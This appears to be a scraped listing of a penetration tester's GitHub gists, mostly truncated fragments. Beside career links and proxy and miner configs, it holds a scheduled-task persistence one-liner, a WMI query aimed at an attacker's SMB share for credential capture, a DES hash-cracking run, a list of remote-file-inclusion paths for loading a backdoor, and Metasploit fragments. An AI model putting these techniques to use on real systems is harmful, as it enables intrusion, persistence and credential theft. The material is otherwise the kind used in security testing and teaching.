- How to Build a Successful Information Security Career (Daniel Miessler)
- The First Steps to a Career in Information Security (Errata Security - Marisa Fagan)
- Hiring your first Security Professional (Peerlyst - Dawid Balut)
- How to Start a Career in Cyber security
- How to Get Into Information Security (ISC^2)
- https://www.isc2.org/how-to-get-into-information-security.aspx
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"mode": "patterns", | |
"proxySettings": [ | |
{ | |
"address": "127.0.0.1", | |
"port": 8080, | |
"username": "", | |
"password": "", | |
"type": 1, | |
"title": "127.0.0.1:8080", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
self.CoinHive = self.CoinHive || {}; | |
self.CoinHive.CONFIG = { | |
LIB_URL: "https://authedmine.com/lib/", | |
ASMJS_NAME: "worker-asmjs.min.js", | |
REQUIRES_AUTH: true, | |
WEBSOCKET_SHARDS: [ | |
["wss://ws001.authedmine.com/proxy", "wss://ws002.authedmine.com/proxy", "wss://ws003.authedmine.com/proxy", "wss://ws004.authedmine.com/proxy", "wss://ws005.authedmine.com/proxy", "wss://ws006.authedmine.com/proxy", "wss://ws007.authedmine.com/proxy", "wss://ws029.authedmine.com/proxy"], | |
["wss://ws008.authedmine.com/proxy", "wss://ws009.authedmine.com/proxy", "wss://ws010.authedmine.com/proxy", "wss://ws011.authedmine.com/proxy", "wss://ws012.authedmine.com/proxy", "wss://ws013.authedmine.com/proxy", "wss://ws014.authedmine.com/proxy", "wss://ws030.authedmine.com/proxy"], | |
["wss://ws015.authedmine.com/proxy", "wss://ws016.authedmine.com/proxy", "wss://ws017.authedmine.com/proxy", "wss://ws018.authedmine.com/proxy", "wss://ws019.authedmine.com/proxy", "wss://ws020.authedmine.com/proxy", "wss://ws |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
### Keybase proof | |
I hereby claim: | |
* I am mubix on github. | |
* I am mubix (https://keybase.io/mubix) on keybase. | |
* I have a public key whose fingerprint is B2B8 E9A7 DD46 5072 8111 7AB0 68B1 8120 B829 7963 | |
To claim this, I am signing this object: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Get-ScheduledTask -TaskName 'XblGameSaveTaskLogon' | % { $_.Actions += New-ScheduledTaskAction -Execute 'calc.exe'; Set-ScheduledTask -TaskPath $_.TaskPath -TaskName $_.TaskName -Action $_.Actions } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
require 'net/smtp' | |
def issue_alert | |
thetimeitfailed = Time.now | |
message = <<MESSAGE_END | |
From: HANDLERCHECKIN <root@metasploithandler> | |
To: Rob Fuller <mubix@hak5.org> | |
Subject: Handler Checkin |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
hashcat64.exe -m 14000 hashes.txt -o cracked.txt -a 3 -1 charsets/DES_full.charset --hex-charset ?1?1?1?1?1?1?1?1 -w 3 | |
- Device #1: GeForce GTX 1080, 2048/8192 MB allocatable, 20MCU | |
Session.Name...: hashcat | |
Status.........: Running | |
Input.Mode.....: Mask (?1?1?1?1?1?1?1?1) [8] | |
Custom.Chars...: -1 charsets/DES_full.charset, -2 Undefined, -3 Undefined, -4 Undefined | |
Hash.Target....: File (des_test.txt) | |
Hash.Type......: DES (PT = $salt, key = $pass) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$share = "\\192.168.1.245\share" | |
$query = "Associators of {win32_LogicalShareSecuritySetting='$share'}" | |
Get-WmiObject -query $query | |
<# | |
Obtained using Impacket's SMBServer.py example | |
Attacker: 192.168.1.245 | |
Victim: 192.168.1.100 | |
Result: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere. | |
# Change XXpathXX to the path of your backdoor. Note that you may need to | |
# try it against every directory on the target and because of how this was | |
# culled you may need to add a question mark to your own XXpathXX URL: | |
# Eg: XXpathXX => http://www.example.com/hax.txt? | |
/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX? | |
/123flashchat.php?e107path=XXpathXX | |
/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX | |
/22_ultimate/templates/header.php?mainpath=XXpathXX | |
/22_ultimate/templates/header.php?mainpath=XXpathXX? |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# This module requires Metasploit: http://metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
class Metasploit3 < Msf::Post | |
include Msf::Post::File |